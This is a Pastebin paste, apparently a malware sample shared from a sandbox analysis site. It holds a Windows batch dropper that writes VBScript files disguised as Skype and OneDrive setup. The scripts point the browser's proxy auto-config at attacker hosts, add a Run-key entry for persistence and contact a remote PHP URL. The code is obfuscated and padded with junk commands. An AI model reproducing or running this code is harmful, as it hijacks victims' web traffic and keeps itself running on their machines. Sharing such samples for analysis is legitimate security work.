Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- :: Shared on https://www.hybrid-analysis.com/sample/1c1d4bb9c66ba15a4c9767168eca450376a1495c0c86bc818e1682ff2bdc2407?environmentId=100
- @echo off
- Set auei=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
- cls
- @echo off
- cls
- cd C:\ProgramData
- cls
- cls
- cls
- md Temporario
- cls
- cd Temporario
- cls
- cls
- cls
- echo DEXA EU RALA FDP > xherecasveiasraspadas.js
- cls
- cd A980S98DF89AS90DF9089SAD890FA089SD89F0890ASD89F0890ASD890F89A0SD09F890SAD890F890ASD890F089A0SD89F
- cls
- cd C:\ProgramData
- cls
- cls
- md Microsoft OneDrive
- cls
- cd Microsoft OneDrive
- cls
- md setup
- cls
- cd setup
- cls
- cls
- echo On Error Resume Next > Skype.vbs
- echo Const HKEY_LOCAL_MACHINE =
- auei:~43,1%80000002 >> Skype.vbs
- echo strComputer = "." >> Skype.vbs
- echo Set BUNDAPRETAShell = WScript.CreateObject("WScript.Shell") >> Skype.vbs
- echo Set oBUNDAPRETAShell = Wscript.CreateObject("Wscript.Shell") >> Skype.vbs
- echo dim xvIDEOSHttp: Set xvIDEOSHttp = createobject("Microsoft.XMLHTTP") >> Skype.vbs
- echo dim bUCETUDAStrm: Set bUCETUDAStrm = createobject("Adodb.Stream") >> Skype.vbs
- echo WScript.Sleep 120000 >> Skype.vbs
- echo Chave = BUNDAPRETAShell.RegRead("HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL") >> Skype.vbs
- echo If Chave = "" Then >> Skype.vbs
- echo valor = "http://mkt.detcaminhoes.com.br/busca/" >> Skype.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD" >> Skype.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> Skype.vbs
- echo Else >> Skype.vbs
- echo valor = "http://mkt.detcaminhoes.com.br/busca/" >> Skype.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD" >> Skype.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> Skype.vbs
- echo End If >> Skype.vbs
- cls
- cls
- cls
- echo WScript.Sleep 120000 >> Skype.vbs
- echo Chave = BUNDAPRETAShell.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindoW") >> Skype.vbs
- echo If Chave = "" Then >> Skype.vbs
- echo valor = "C:\ProgramData\Temp\control.vbs" >> Skype.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindoW", valor, "REG_SZ" >> Skype.vbs
- echo Else >> Skype.vbs
- echo valor = "C:\ProgramData\Temp\control.vbs" >> Skype.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindoW", valor, "REG_SZ" >> Skype.vbs
- echo End If >> Skype.vbs
- cls
- cls
- cls
- cls
- echo Dim shl >> Skype.vbs
- echo Set shl = CreateObject("Wscript.Shell") >> Skype.vbs
- echo Call shl.Run("""C:\ProgramData\Microsoft OneDrive\setup\Skype.vbs""") >> Skype.vbs
- echo Set shl = Nothing >> Skype.vbs
- echo WScript.Quit >> Skype.vbs
- echo WScript.Quit >> Skype.vbs
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- start Skype.vbs
- cls
- cls
- cd A980S98DF89AS90DF9089SAD890FA089SD89F0890ASD89F0890ASD890F89A0SD09F890SAD890F890ASD890F089A0SD89F
- cls
- cd C:\ProgramData
- cls
- cls
- cls
- md Temp
- cls
- cd Temp
- cls
- cls
- cls
- cls
- echo On Error Resume Next > control.vbs
- echo Const HKEY_LOCAL_MACHINE =
- auei:~43,1%80000002 >> control.vbs
- echo strComputer = "." >> control.vbs
- echo Set BUNDAPRETAShell = WScript.CreateObject("WScript.Shell") >> control.vbs
- echo Set oBUNDAPRETAShell = Wscript.CreateObject("Wscript.Shell") >> control.vbs
- echo dim xvIDEOSHttp: Set xvIDEOSHttp = createobject("Microsoft.XMLHTTP") >> control.vbs
- echo dim bUCETUDAStrm: Set bUCETUDAStrm = createobject("Adodb.Stream") >> control.vbs
- echo WScript.Sleep 120000 >> control.vbs
- echo Chave = BUNDAPRETAShell.RegRead("HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL") >> control.vbs
- echo If Chave = "" Then >> control.vbs
- echo valor = "http://dyndns.vpsbrasil.club/vaikarai/" >> control.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD" >> control.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> control.vbs
- echo Else >> control.vbs
- echo valor = "http://dyndns.vpsbrasil.club/vaikarai/" >> control.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable", 0, "REG_DWORD" >> control.vbs
- echo oBUNDAPRETAShell.RegWrite "HKCU\Software\Microsoft\Windows\currentVersion\Internet Settings\AutoConfigURL", valor, "REG_SZ" >> control.vbs
- echo End If >> control.vbs
- echo Dim shl >> control.vbs
- echo Set shl = CreateObject("Wscript.Shell") >> control.vbs
- echo Call shl.Run("""C:\ProgramData\Temp\control.vbs""") >> control.vbs
- echo Set shl = Nothing >> control.vbs
- echo WScript.Quit >> control.vbs
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cd C:\ProgramData
- cls
- cls
- cls
- md Temp
- cls
- cd Temp
- cls
- md Google
- cls
- cd Google
- cls
- cls
- cls
- md Google
- md Chrome
- md Java
- md Drive
- md Bing
- md Flash Player
- cls
- cd Google
- cls
- cls
- echo Dim oXMLHTTP > GetUrl.vbs
- echo Dim oStream >> GetUrl.vbs
- echo Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP.3.0") >> GetUrl.vbs
- echo oXMLHTTP.Open "GET", "http://fernandacampospb.com.br/nefertari/90AS98DF.php", False >> GetUrl.vbs
- echo oXMLHTTP.Send >> GetUrl.vbs
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- start GetUrl.vbs
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- cls
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement